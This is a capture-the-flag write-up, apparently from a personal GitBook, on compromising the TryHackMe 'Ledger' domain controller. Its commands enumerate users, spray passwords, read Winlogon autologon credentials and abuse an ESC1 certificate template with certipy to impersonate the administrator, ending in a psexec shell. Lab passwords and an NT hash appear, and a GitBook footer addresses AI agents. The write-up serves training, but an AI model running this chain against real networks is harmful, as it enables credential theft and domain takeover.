> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-ledger.md).

# THM - Ledger

### NMAP

```bash
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-02-09 20:15:03Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:labyrinth.thm.local, DNS:thm.local, DNS:THM
| Issuer: commonName=thm-LABYRINTH-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-12T07:32:36
| Not valid after:  2024-05-11T07:32:36
| MD5:   eae1:9bc6:ffbf:ac19:f750:22bd:7186:943a
|_SHA-1: 5bd6:40fd:76e2:d5ab:3909:5bcc:7a4f:4f4c:f7c6:2e34
|_ssl-date: 2026-02-09T20:15:33+00:00; -1s from scanner time.
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2026-02-09T20:15:33+00:00; -1s from scanner time.
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=thm-LABYRINTH-CA
| Issuer: commonName=thm-LABYRINTH-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-12T07:26:00
| Not valid after:  2028-05-12T07:35:59
| MD5:   c249:3bc6:fd31:f2aa:83cb:2774:bc66:9151
|_SHA-1: 397a:54df:c1ff:f9fd:57e4:a944:00e8:cfdb:6e3a:972b
|_http-title: IIS Windows Server
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:labyrinth.thm.local
| Issuer: commonName=thm-LABYRINTH-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-02-09T20:05:18
| Not valid after:  2027-02-09T20:05:18
| MD5:   f74f:6875:1c44:d945:baa5:9620:1757:b1fd
|_SHA-1: 8b6f:3876:358d:d600:0e5e:df2f:2132:6b9d:3962:629a
|_ssl-date: 2026-02-09T20:15:33+00:00; -1s from scanner time.
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-02-09T20:15:33+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Issuer: commonName=labyrinth.thm.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-02-08T20:14:21
| Not valid after:  2026-08-10T20:14:21
| MD5:   2cde:abcd:c68c:e775:b283:b73a:dfb4:89ba
|_SHA-1: d321:44b3:669d:12e6:2996:a05d:c183:63eb:0a40:c593
No exact OS matches for host (If you know what OS is running on it, see <https://nmap.org/submit/> ).

```

### SMB

```bash
smbclient -L \\\\10.80.177.130\\
Password for [WORKGROUP\ajay]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.80.177.130 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available                                                       
```

Anonymous access works

#### Enumerating users using RID-Brute

```bash
nxc smb 10.80.177.130 -u guest -p "" --rid-brute
SMB         10.80.177.130   445    LABYRINTH        [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False) 
SMB         10.80.177.130   445    LABYRINTH        [+] thm.local\guest: 
SMB         10.80.177.130   445    LABYRINTH        498: THM\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.80.177.130   445    LABYRINTH        500: THM\Administrator (SidTypeUser)
SMB         10.80.177.130   445    LABYRINTH        501: THM\Guest (SidTypeUser)
SMB         10.80.177.130   445    LABYRINTH        502: THM\krbtgt (SidTypeUser)
SMB         10.80.177.130   445    LABYRINTH        512: THM\Domain Admins (SidTypeGroup)
SMB         10.80.177.130   445    LABYRINTH        513: THM\Domain Users (SidTypeGroup)
SMB         10.80.177.130   445    LABYRINTH        514: THM\Domain Guests (SidTypeGroup)
SMB         10.80.177.130   445    LABYRINTH        515: THM\Domain Computers (SidTypeGroup)
SMB         10.80.177.130   445    LABYRINTH        516: THM\Domain Controllers (SidTypeGroup)
SMB         10.80.177.130   445    LABYRINTH        517: THM\Cert Publishers (SidTypeAlias)
SMB         10.80.177.130   445    LABYRINTH        518: THM\Schema Admins (SidTypeGroup)
SMB         10.80.177.130   445    LABYRINTH        519: THM\Enterprise Admins (SidTypeGroup)
SMB         10.80.177.130   445    LABYRINTH        520: THM\Group Policy Creator Owners (SidTypeGroup)
SMB         10.80.177.130   445    LABYRINTH        521: THM\Read-only Domain Controllers (SidTypeGroup)
SMB         10.80.177.130   445    LABYRINTH        522: THM\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.80.177.130   445    LABYRINTH        525: THM\Protected Users (SidTypeGroup)
SMB         10.80.177.130   445    LABYRINTH        526: THM\Key Admins (SidTypeGroup)
SMB         10.80.177.130   445    LABYRINTH        527: THM\Enterprise Key Admins (SidTypeGroup)
```

Got password leaked for 2 users through nxc over ldap

```bash
nxc ldap 10.80.177.130 -u guest -p "" --users
LDAP        10.80.177.130   389    LABYRINTH        [*] Windows 10 / Server 2019 Build 17763 (name:LABYRINTH) (domain:thm.local)
LDAP        10.80.177.130   389    LABYRINTH        [+] thm.local\guest: 
LDAP        10.80.177.130   389    LABYRINTH        [*] Enumerated 487 domain users: thm.local
LDAP        10.80.177.130   389    LABYRINTH        -Username-                    -Last PW Set-       -BadPW-  -Description-                                               
LDAP        10.80.177.130   389    LABYRINTH        Guest                         <never>             1        Tier 1 User                                                 
LDAP        10.80.177.130   389    LABYRINTH        greg                          2023-05-15 10:49:03 1        Tier 1 User                                                 
LDAP        10.80.177.130   389    LABYRINTH        SHANA_FITZGERALD              2023-05-30 05:45:58 1           
LDAP        10.80.177.130   389    LABYRINTH        IVY_WILLIS                    2023-05-30 08:30:55 0        Please change it: CHANGEME2023!                             
LDAP        10.80.177.130   389    LABYRINTH        SOFIA_PATTERSON               2023-05-30 05:46:49 0                                                                    
LDAP        10.80.177.130   389    LABYRINTH        JANE_FOLEY                    2023-05-30 05:46:49 0                                                                    
LDAP        10.80.177.130   389    LABYRINTH        PEARL_FULLER                  2023-05-30 05:46:49 0                                                                    
LDAP        10.80.177.130   389    LABYRINTH        GUADALUPE_TURNER              2023-05-30 05:46:50 0        Tier 1 User                                                 
LDAP        10.80.177.130   389    LABYRINTH        VIVIAN_HARPER                 2023-05-30 05:46:50 0                                                                    
LDAP        10.80.177.130   389    LABYRINTH        VICENTE_BURT                  2023-05-30 05:46:50 0                                                                    
LDAP        10.80.177.130   389    LABYRINTH        DIXIE_BERGER                  2023-05-30 05:46:50 0                                                                    
LDAP        10.80.177.130   389    LABYRINTH        LIZ_WALTER                    2023-05-30 05:46:50 0        Tier 1 User                                                 
LDAP        10.80.177.130   389    LABYRINTH        SUSANNA_MCKNIGHT              2023-07-05 11:11:32 0        Please change it: CHANGEME2023!        
```

```
IVY_WILLIS : CHANGEME2023!
SUSANNA_MCKNIGHT : CHANGEME2023!
```

```bash
nxc smb 10.80.177.130 -u domusers.txt -p CHANGEME2023!                       
SMB         10.80.177.130   445    LABYRINTH        [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False) 
SMB         10.80.177.130   445    LABYRINTH        [+] thm.local\IVY_WILLIS:CHANGEME2023!

$ nxc smb 10.80.177.130 -u SUSANNA_MCKNIGHT -p CHANGEME2023!                                      
SMB         10.80.177.130   445    LABYRINTH        [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False) 
SMB         10.80.177.130   445    LABYRINTH        [+] thm.local\SUSANNA_MCKNIGHT:CHANGEME2023! 
```

### Bloodhound

```bash
(ajay㉿kali)-[~]
└─$ bloodhound-python -u IVY_WILLIS -p 'CHANGEME2023!' -d thm.local -dc labyrinth.thm.local -ns 10.80.177.130 -c All
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: thm.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: labyrinth.thm.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: labyrinth.thm.local
INFO: Found 493 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 222 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: labyrinth.thm.local
INFO: Done in 00M 37S

```

```bash
ls
20260209161015_computers.json   20260209161015_domains.json  20260209161015_groups.json  20260209161015_users.json  Desktop    domusers.txt  hash1.asrep   Music     Public   Templates  user.txt        Videos
20260209161015_containers.json  20260209161015_gpos.json     20260209161015_ous.json     asrep_hashes.txt           Documents  Downloads     hashes.asrep  Pictures  reports  Tools      validusers.txt
                                                                                                                                                                                                          
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FzktnFE7afSaygvO2mteE%2Fimage.png?alt=media&amp;token=495bdf9d-ab23-4a47-a5cf-0199d5cd039a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmWDAObxxFtUIZtTS2SkJ%2Fimage.png?alt=media&amp;token=eb5e5124-a507-4a4c-aa49-9fabcafec8c1" alt=""><figcaption></figcaption></figure>

We can rdp to susanna.

## RDP access as Susanna

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FisbXVoV1v2tfVia2z8hO%2Fimage.png?alt=media&amp;token=64fe52b6-b466-4240-ae86-8c41f87d8de5" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FXSvZNClx9I8c1SZpLamJ%2Fimage.png?alt=media&amp;token=0eeac534-5007-4c59-8174-846cc6f608d8" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FQb55aAcg08zFzXn6UqRf%2Fimage.png?alt=media&amp;token=f274be63-f4c2-4aea-8ac5-583478c0c43c" alt=""><figcaption></figcaption></figure>

Found password for andrea in winlogon

#### Winlogon Credentials

```bash
PS C:\Users> reg query "HKLM\SOFTWARE\microsoft\windows nt\currentversion\winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\microsoft\windows nt\currentversion\winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ
    LegalNoticeText    REG_SZ
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    scremoveoption    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0x7bee3fd056
    ShutdownFlags    REG_DWORD    0x80000027
    ShellAppRuntime    REG_SZ    ShellAppRuntime.exe
    DisableLockWorkstation    REG_DWORD    0x0
    DefaultDomainName    REG_SZ    THM
    New Value #1    REG_SZ
    New Value #2    REG_SZ
    New Value #3    REG_SZ
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    Passw0rd
    DefaultUserName    REG_SZ    andrea
    AutoLogonSID    REG_SZ    S-1-5-21-1966530601-3185510712-10604624-1112
    LastUsedUsername    REG_SZ    andrea

HKEY_LOCAL_MACHINE\SOFTWARE\microsoft\windows nt\currentversion\winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\microsoft\windows nt\currentversion\winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\microsoft\windows nt\currentversion\winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\microsoft\windows nt\currentversion\winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\microsoft\windows nt\currentversion\winlogon\VolatileUserMgrKey
```

But there is no user andrea on the domain.

```bash
nxc smb 10.80.177.130 -u validusers.txt -p Passw0rd                                             
SMB         10.80.177.130   445    LABYRINTH        [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False) 
SMB         10.80.177.130   445    LABYRINTH        [-] thm.local\Administrator:Passw0rd STATUS_ACCOUNT_RESTRICTION 
SMB         10.80.177.130   445    LABYRINTH        [-] thm.local\Guest:Passw0rd STATUS_LOGON_FAILURE 
SMB         10.80.177.130   445    LABYRINTH        [-] thm.local\krbtgt:Passw0rd STATUS_LOGON_FAILURE 
SMB         10.80.177.130   445    LABYRINTH        [-] thm.local\LABYRINTH$:Passw0rd STATUS_LOGON_FAILURE 
SMB         10.80.177.130   445    LABYRINTH        [+] thm.local\greg:Passw0rd 
                                                                                 
```

performing password spraying, the cred works against the user Greg.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FToPpmSgh0j0pMow8INk4%2Fimage.png?alt=media&amp;token=e1d54ecb-b514-4ee0-a9ba-0ca2ddbf7717" alt=""><figcaption></figcaption></figure>

Also Sussana is part of the BUILTIN\Certificate Service DCOM Access

we can user certipy to enumerate furthur.

```bash
      ─(ajay㉿kali)-[~]
└─$ certipy-ad find -username SUSANNA_MCKNIGHT@thm.local -password CHANGEME2023! -dc-ip 10.80.177.130
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 14 enabled certificate templates
[*] Finding issuance policies
[*] Found 21 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'thm-LABYRINTH-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'thm-LABYRINTH-CA'
[*] Checking web enrollment for CA 'thm-LABYRINTH-CA' @ 'labyrinth.thm.local'
[*] Saving text output to '20260209165955_Certipy.txt'
[*] Wrote text output to '20260209165955_Certipy.txt'
[*] Saving JSON output to '20260209165955_Certipy.json'
[*] Wrote JSON output to '20260209165955_Certipy.json'                                                                                                                                                                                                                           
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4NlGVA3qGE8LosCXnSge%2Fimage.png?alt=media&amp;token=f03ce1cb-4db7-4c20-847b-33d7cba1b4d1" alt=""><figcaption></figcaption></figure>

Template Server Auth have ESC1 enabled.

For a template to be vulnerable to ESC1, it needs three specific "ingredients," all of which are present here:

1. **Enrollee Supplies Subject:** `True`. This means the user requesting the certificate can claim to be *anyone* (like the Domain Administrator).
2. **Client Authentication:** `True`. This means the resulting certificate can be used to log in to the network.
3. **Enrollment Rights:** `THM.LOCAL\Authenticated Users`. Since Susanna is an authenticated user, she has permission to use this template.

## Exploiting ESC1

```bash
┌──(ajay㉿kali)-[~]
└─$ certipy-ad req -u SUSANNA_MCKNIGHT@thm.local -p 'CHANGEME2023!' -target 10.80.177.130 -template ServerAuth -ca thm-LABYRINTH-CA -upn administrator@thm.local
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: THM.LOCAL.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 25
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@thm.local'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

```

```bash
┌──(ajay㉿kali)-[~]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.80.177.130
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@thm.local'
[*] Using principal: 'administrator@thm.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@thm.local': aad3b435b51404eeaad3b435b51404ee:07d677a6cf40925beb80ad6428752322
```

```bash
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ export KRB5CCNAME=administrator.ccache                                
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ impacket-psexec -k -no-pass thm.local/administrator@labyrinth.thm.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on labyrinth.thm.local.....
[*] Found writable share ADMIN$
[*] Uploading file FtrFYSQF.exe
[*] Opening SVCManager on labyrinth.thm.local.....
[*] Creating service OMsS on labyrinth.thm.local.....
[*] Starting service OMsS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4377]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> 

```

```bash
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\Administrator\Desktop

05/31/2023  08:18 AM    <DIR>          .
05/31/2023  08:18 AM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
05/31/2023  07:33 AM                29 root.txt
               3 File(s)          1,110 bytes
               2 Dir(s)  12,456,378,368 bytes free
```

```bash
C:\Users\Administrator\Desktop> more root.txt
THM{THE_BYPASS_IS_CERTIFIED!}
```

Also pwn the machine using the Greg way too but i choose this.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-ledger.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
